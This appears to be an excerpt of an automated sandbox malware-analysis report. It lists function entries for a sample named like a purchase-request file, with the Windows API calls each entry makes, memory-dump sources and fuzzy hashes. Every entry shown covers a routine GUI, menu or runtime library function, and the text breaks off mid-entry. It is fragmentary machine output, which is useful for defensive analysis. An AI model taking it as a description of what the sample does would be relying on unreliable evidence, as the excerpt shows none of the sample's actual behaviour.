                                              • Instruction Fuzzy Hash: F2511B60A0478429FB36EBB188547EABFB49F15380F08459DC6C25B5E2DB749B8CCF52
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 0013C746
                                              • GetWindowRect.USER32(00000000,?), ref: 0013C758
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0013C7B6
                                              • GetDlgItem.USER32(?,00000002), ref: 0013C7C1
                                              • GetWindowRect.USER32(00000000,?), ref: 0013C7D3
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0013C827
                                              • GetDlgItem.USER32(?,000003E9), ref: 0013C835
                                              • GetWindowRect.USER32(00000000,?), ref: 0013C846
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0013C889
                                              • GetDlgItem.USER32(?,000003EA), ref: 0013C897
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0013C8B4
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0013C8C1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: cb062aace9090e2d9ca86dc1f743d1a7df99bac5af07df5d902fb488b8851346
                                              • Instruction ID: c76c8f1aa39aac9df5f227703d40123103c0fb1d992687b3b58548abc0a02cec
                                              • Opcode Fuzzy Hash: cb062aace9090e2d9ca86dc1f743d1a7df99bac5af07df5d902fb488b8851346
                                              • Instruction Fuzzy Hash: 70514171B00205AFDB18CF69DD89AAEBBB6FB88311F14812DF515E72A0D7B09D41CB50
                                              APIs
                                                • Part of subcall function 000E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E2036,?,00000000,?,?,?,?,000E16CB,00000000,?), ref: 000E1B9A
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000E20D3
                                              • KillTimer.USER32(-00000001,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 000E216E
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0011BEF6
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 0011BF27
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 0011BF3E
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000E16CB,00000000,?,?,000E1AE2,?,?), ref: 0011BF5A
                                              • DeleteObject.GDI32(00000000), ref: 0011BF6C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 18d861e367e23e83e9cf21cf990a0f8e13a3ac69f19f5c39057a5cbb4d60e6d5
                                              • Instruction ID: e0966ba07af0286a87fef4def2909050c5c920d91f4beb9e10db92f9036cd69d
                                              • Opcode Fuzzy Hash: 18d861e367e23e83e9cf21cf990a0f8e13a3ac69f19f5c39057a5cbb4d60e6d5
                                              • Instruction Fuzzy Hash: A761A931104791DFCB399F16DD88B6AB7FAFB51312F14852CE152A69A1C7B5A8C2CF80
                                              APIs
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • GetSysColor.USER32(0000000F), ref: 000E21D3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: 292c651f444a78dc44ff3d0a74734f036cad00c8c558cb96bb778de5bbc4784f
                                              • Instruction ID: 71037f1eba858d638e3234338917b54570dbbf1b14c3da4cd203132058b74ee7
                                              • Opcode Fuzzy Hash: 292c651f444a78dc44ff3d0a74734f036cad00c8c558cb96bb778de5bbc4784f
                                              • Instruction Fuzzy Hash: D441A631144180FFDB255F29EC48BB937A9FB06331F184269FE659A1E2C7718C82DB61
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,0016F910), ref: 0014AB76
                                              • GetDriveTypeW.KERNEL32(00000061,0019A620,00000061), ref: 0014AC40
                                              • _wcscpy.LIBCMT ref: 0014AC6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 900e23fd7b9ba6ba72b608b4d8bb7afdaad734be64e21c77cf2c7d5b253b3323
                                              • Instruction ID: 73590bd3bd4da25c6282f4962bba1f4dead6bbda0de50ea026f8fcef5c7c58fe
                                              • Opcode Fuzzy Hash: 900e23fd7b9ba6ba72b608b4d8bb7afdaad734be64e21c77cf2c7d5b253b3323
                                              • Instruction Fuzzy Hash: 5C51CE301883419FC714EF54C891AAAB7A5EF94310F95482DF496A72A2DB71DD0ACB93
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0016896E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID: @U=u
                                              • API String ID: 634782764-2594219639
                                              • Opcode ID: aefc78534f97c49c152704aec443efb404f3077009cbbb02adddd6d071099d68
                                              • Instruction ID: 28e7a617edc3c18e9b0ecfacc0d3e8c58c35e7e25e37b54c18f05c3147d0fd0b
                                              • Opcode Fuzzy Hash: aefc78534f97c49c152704aec443efb404f3077009cbbb02adddd6d071099d68
                                              • Instruction Fuzzy Hash: FD51C530600208BFDF349F68CC85BA97B69FF05314F604616FA11E75A1DFB1A9A0CB91
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0011C547
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0011C569
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0011C581
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0011C59F
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0011C5C0
                                              • DestroyIcon.USER32(00000000), ref: 0011C5CF
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0011C5EC
                                              • DestroyIcon.USER32(?), ref: 0011C5FB
                                                • Part of subcall function 0016A71E: DeleteObject.GDI32(00000000), ref: 0016A757
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID: @U=u
                                              • API String ID: 2819616528-2594219639
                                              • Opcode ID: cc2d4375d1f9b84c36c40e3be4cd7a1aba08b9bd27680e1a1058cd44a01de4b5
                                              • Instruction ID: 108e2f360f8f6f9e0a8ec3d2aecb7daf09e54dedfa30773bb332650da8a747e3
                                              • Opcode Fuzzy Hash: cc2d4375d1f9b84c36c40e3be4cd7a1aba08b9bd27680e1a1058cd44a01de4b5
                                              • Instruction Fuzzy Hash: 6D515970640349EFDB24DF25DC45FAA37B9EB54310F104528F902A76A0DBB0ED91DBA0
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: 2303fe81068e4eca5a9afb2580c1b1dddb90c2dd9f507fd068dc6d3e49a9b5ef
                                              • Instruction ID: 5d9f348f6bc11c84800e8e74b05d5e6f7d6852b5e4e856ced159c0c7f6d658ba
                                              • Opcode Fuzzy Hash: 2303fe81068e4eca5a9afb2580c1b1dddb90c2dd9f507fd068dc6d3e49a9b5ef
                                              • Instruction Fuzzy Hash: 5841C671504209AFDB28EB39D842F7AB3E8EF44304F24447EF589D7292EB719942CB51
                                              APIs
                                              • _memset.LIBCMT ref: 001673D9
                                              • CreateMenu.USER32 ref: 001673F4
                                              • SetMenu.USER32(?,00000000), ref: 00167403
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00167490
                                              • IsMenu.USER32(?), ref: 001674A6
                                              • CreatePopupMenu.USER32 ref: 001674B0
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001674DD
                                              • DrawMenuBar.USER32 ref: 001674E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: c9d8cea2bf1af4123e93ad842a2ffd38a99da1424045588b3a28525c4d88df47
                                              • Instruction ID: 94cf00284a1deaf3606fe928608935752bd11f5aa9910b58d4878f7bd1bd8efd
                                              • Opcode Fuzzy Hash: c9d8cea2bf1af4123e93ad842a2ffd38a99da1424045588b3a28525c4d88df47
                                              • Instruction Fuzzy Hash: AB414975A01209EFDB10DF68EC48AAABBB9FF49304F144029F956973A0DB74AD60CF50
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001394F6
                                              • GetDlgCtrlID.USER32 ref: 00139501
                                              • GetParent.USER32 ref: 0013951D
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00139520
                                              • GetDlgCtrlID.USER32(?), ref: 00139529
                                              • GetParent.USER32(?), ref: 00139545
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00139548
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 1536045017-2258501812
                                              • Opcode ID: 188468d8e8819d85d8ac96933723a1d2c850726599256d54f0e46230c3daa1fe
                                              • Instruction ID: 91c918cfd67626468e29025bfcbcbd40b750b579c95f8f46f63b460c7430e700
                                              • Opcode Fuzzy Hash: 188468d8e8819d85d8ac96933723a1d2c850726599256d54f0e46230c3daa1fe
                                              • Instruction Fuzzy Hash: D321C170904204BFDF05AB65DC85DFEBB78EF49300F11012AF962972A2EBB55959DB20
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001395DF
                                              • GetDlgCtrlID.USER32 ref: 001395EA
                                              • GetParent.USER32 ref: 00139606
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00139609
                                              • GetDlgCtrlID.USER32(?), ref: 00139612
                                              • GetParent.USER32(?), ref: 0013962E
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00139631
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 1536045017-2258501812
                                              • Opcode ID: 5f58a1cf5da039d89dff14e6030b0be20814a05832b79797f0a3051d0018a514
                                              • Instruction ID: fcace5e68e4df62f03ffa3158eeb52859e572e463edce1030d7b369a1c43e6c3
                                              • Opcode Fuzzy Hash: 5f58a1cf5da039d89dff14e6030b0be20814a05832b79797f0a3051d0018a514
                                              • Instruction Fuzzy Hash: CD21F9B4900204BFDF05AB65CCC5EFEBB78EF58300F15002AF921971A2DBB59959DB20
                                              APIs
                                              • GetParent.USER32 ref: 00139651
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00139666
                                              • _wcscmp.LIBCMT ref: 00139678
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001396F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-1428604138
                                              • Opcode ID: 34f9fa4f3e1554426940896074ad600d0a13c6b6a98a39bebb7e4ffe3983c69c
                                              • Instruction ID: e696cfbd3afd60717240db40d9498952596432fdfe5667e8ab9fc0d2f6d04e5e
                                              • Opcode Fuzzy Hash: 34f9fa4f3e1554426940896074ad600d0a13c6b6a98a39bebb7e4ffe3983c69c
                                              • Instruction Fuzzy Hash: FC1148B7649307BAFA052625EC0BDA7779CCB14370F21002BF910A50E2FFE269518A98
                                              APIs
                                              • _memset.LIBCMT ref: 0010707B
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              • __gmtime64_s.LIBCMT ref: 00107114
                                              • __gmtime64_s.LIBCMT ref: 0010714A
                                              • __gmtime64_s.LIBCMT ref: 00107167
                                              • __allrem.LIBCMT ref: 001071BD
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001071D9
                                              • __allrem.LIBCMT ref: 001071F0
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0010720E
                                              • __allrem.LIBCMT ref: 00107225
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00107243
                                              • __invoke_watson.LIBCMT ref: 001072B4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                              • Instruction ID: 574bf22de3e0fedf4b457c0f9734d8ac6de181795d6453eb4a047936d2e88c0a
                                              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                              • Instruction Fuzzy Hash: A071E971E04717ABE718AE79CC41BAAB3A8AF65724F14423AF554E72C1E7B0F94087D0
                                              APIs
                                              • _memset.LIBCMT ref: 00142A31
                                              • GetMenuItemInfoW.USER32(001A6890,000000FF,00000000,00000030), ref: 00142A92
                                              • SetMenuItemInfoW.USER32(001A6890,00000004,00000000,00000030), ref: 00142AC8
                                              • Sleep.KERNEL32(000001F4), ref: 00142ADA
                                              • GetMenuItemCount.USER32(?), ref: 00142B1E
                                              • GetMenuItemID.USER32(?,00000000), ref: 00142B3A
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00142B64
                                              • GetMenuItemID.USER32(?,?), ref: 00142BA9
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00142BEF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00142C03
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00142C24
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: 66a187d65b5e553eb32544e61524033cc790763dbc882baca867068f8509dca8
                                              • Instruction ID: 9e578d0864c68301dc305eee9cb9ed6c3e1bf45e9921e8c2bd279e8307c03317
                                              • Opcode Fuzzy Hash: 66a187d65b5e553eb32544e61524033cc790763dbc882baca867068f8509dca8
                                              • Instruction Fuzzy Hash: 9761A2B0900249AFDB21CF64DC88EBEBBB8FB51304F940569F84297261D771ADC6DB21
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00167214
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00167217
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016723B
                                              • _memset.LIBCMT ref: 0016724C
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0016725E
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001672D6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 58db5233346cf3592758fecdaa09322c1af9ce16f462092374df67be016cb017
                                              • Instruction ID: 48549f08a1c2239e3c20809344a1381802a5ca2df4ef2f1e48992e9fab8fa339
                                              • Opcode Fuzzy Hash: 58db5233346cf3592758fecdaa09322c1af9ce16f462092374df67be016cb017
                                              • Instruction Fuzzy Hash: 31617975A00208AFDB10DFA4CC81EEEB7B8AB09704F14415AFA15A73E1D774A951DB60
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00137135
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0013718E
                                              • VariantInit.OLEAUT32(?), ref: 001371A0
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 001371C0
                                              • VariantCopy.OLEAUT32(?,?), ref: 00137213
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00137227
                                              • VariantClear.OLEAUT32(?), ref: 0013723C
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00137249
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00137252
                                              • VariantClear.OLEAUT32(?), ref: 00137264
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0013726F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 40231dfeb18ecf114421debfe39369c9b0f7d1f4eeba0481c1142c3d75f35094
                                              • Instruction ID: ca15c2b80bf25c6ac3af02e940685ee1ae8f5acbd6d224eef9c4bae22a5238d4
                                              • Opcode Fuzzy Hash: 40231dfeb18ecf114421debfe39369c9b0f7d1f4eeba0481c1142c3d75f35094
                                              • Instruction Fuzzy Hash: 1F415E75A04219AFCF14DFA8DC489EEBBB8FF48354F008069F915A7661CB70A946CB90
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • GetSystemMetrics.USER32(0000000F), ref: 0016D78A
                                              • GetSystemMetrics.USER32(0000000F), ref: 0016D7AA
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0016D9E5
